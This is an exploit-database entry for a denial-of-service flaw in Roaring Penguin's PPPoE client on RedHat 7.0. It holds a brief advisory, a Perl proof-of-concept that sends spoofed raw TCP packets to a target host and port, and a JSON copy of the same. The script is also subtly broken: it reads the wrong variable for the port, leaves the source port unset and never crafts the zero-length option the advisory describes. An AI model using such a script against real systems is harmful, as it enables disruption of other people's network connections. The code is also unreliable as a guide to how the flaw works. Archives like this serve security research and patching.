Search...

RedHat Linux 7.0 Roaring Penguin PPPoE Denial of Service Vulnerability

2014-07-01T00:00:00

ID SSV:74369
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                source: http://www.securityfocus.com/bid/2098/info

Roaring Penguin Software&#39;s PPPoE is a freeware PPP over Ethernet client often used by ADSL subscribers running Linux or NetBSD.

PPPoE contains a possibly remotely exploitable denial of service vulnerability in its handling of TCP packets when the Clamp_MSS option is used. If PPPoE recieves a malformed TCP packet with a &#34;zero-length option&#34;, PPPoE will go into an infinite loop. As a result, the ppp connection being supported by PPPoE will time out and be terminated. A manual re-start is needed to regain functionality.

This bug has been fixed by Roaring Penguin Software in a new version, see the solutions section. 

#!/usr/bin/perl
# POC script that causes a DoS in an PPP-over-Ethernet Link, in RedHat 7.0.
# Advisory: http://www.redhat.com/support/errata/RHSA-2000-130.html
# by dethy
use Net::RawIP;
use Getopt::Std;
getopts(&#39;d:s:p:c&#39;,\%args) || &usage;
if(defined($args{d})){$daddr=$args{d};}else{&usage;}
if(defined($args{s})){$src=$args{s};}else{$src=&randsrc;}
if(defined($port{p})){$port=$args{p};}else{&usage;}
if(defined($args{c})){$count=$args{c};}else{$count=10;}

sub randport(){
 srand;
 return $sport=(int rand 65510); 
 }

sub randsrc(){
  srand; 
  return $saddr=(int rand 255).&#34;.&#34;.(int rand 255).&#34;.&#34;.(int rand 255).&#34;.&#34;.(int rand 255); 
 }

 $packet = new Net::RawIP({ip=&#62;{},tcp=&#62;{}});
 $packet-&#62;set({ ip =&#62; { saddr =&#62; $src, 
			daddr =&#62; $daddr, 
			tos =&#62; 3 },
               tcp =&#62; { source =&#62; $sport, 
			dest =&#62; $port,
                        syn =&#62; 1, psh =&#62; 1 } });

 $packet-&#62;send(0,$count);

sub usage(){ die(&#34;pppoe-link POC DoS on RH7\n$0 -d &#60;dest&#62; -s &#60;source&#62; -p &#60;port&#62; -c &#60;count&#62;\n&#34;); }

JSON Vulners Source

Initial Source

{"lastseen": "2017-11-19T15:27:58", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "cve,poc", "enchantments": {"score": {"value": -0.5, "vector": "NONE", "modified": "2017-11-19T15:27:58", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T15:27:58", "rev": 2}, "vulnersScore": -0.5}, "href": "https://www.seebug.org/vuldb/ssvid-74369", "references": [], "enchantments_done": [], "id": "SSV:74369", "title": "RedHat Linux 7.0 Roaring Penguin PPPoE Denial of Service Vulnerability", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 1, "sourceData": "\n source: http://www.securityfocus.com/bid/2098/info\r\n\r\nRoaring Penguin Software's PPPoE is a freeware PPP over Ethernet client often used by ADSL subscribers running Linux or NetBSD.\r\n\r\nPPPoE contains a possibly remotely exploitable denial of service vulnerability in its handling of TCP packets when the Clamp_MSS option is used. If PPPoE recieves a malformed TCP packet with a "zero-length option", PPPoE will go into an infinite loop. As a result, the ppp connection being supported by PPPoE will time out and be terminated. A manual re-start is needed to regain functionality.\r\n\r\nThis bug has been fixed by Roaring Penguin Software in a new version, see the solutions section. \r\n\r\n#!/usr/bin/perl\r\n# POC script that causes a DoS in an PPP-over-Ethernet Link, in RedHat 7.0.\r\n# Advisory: http://www.redhat.com/support/errata/RHSA-2000-130.html\r\n# by dethy\r\nuse Net::RawIP;\r\nuse Getopt::Std;\r\ngetopts('d:s:p:c',\\%args) || &usage;\r\nif(defined($args{d})){$daddr=$args{d};}else{&usage;}\r\nif(defined($args{s})){$src=$args{s};}else{$src=&randsrc;}\r\nif(defined($port{p})){$port=$args{p};}else{&usage;}\r\nif(defined($args{c})){$count=$args{c};}else{$count=10;}\r\n\r\nsub randport(){\r\n srand;\r\n return $sport=(int rand 65510); \r\n }\r\n\r\nsub randsrc(){\r\n srand; \r\n return $saddr=(int rand 255).".".(int rand 255).".".(int rand 255).".".(int rand 255); \r\n }\r\n\r\n $packet = new Net::RawIP({ip=>{},tcp=>{}});\r\n $packet->set({ ip => { saddr => $src, \r\n\t\t\tdaddr => $daddr, \r\n\t\t\ttos => 3 },\r\n tcp => { source => $sport, \r\n\t\t\tdest => $port,\r\n syn => 1, psh => 1 } });\r\n\r\n $packet->send(0,$count);\r\n\r\nsub usage(){ die("pppoe-link POC DoS on RH7\\n$0 -d <dest> -s <source> -p <port> -c <count>\\n"); }\r\n\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-74369", "type": "seebug", "immutableFields": []}